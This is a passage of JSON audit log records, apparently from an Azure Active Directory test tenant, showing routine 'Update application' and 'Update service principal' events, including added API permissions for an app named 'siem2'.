-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": 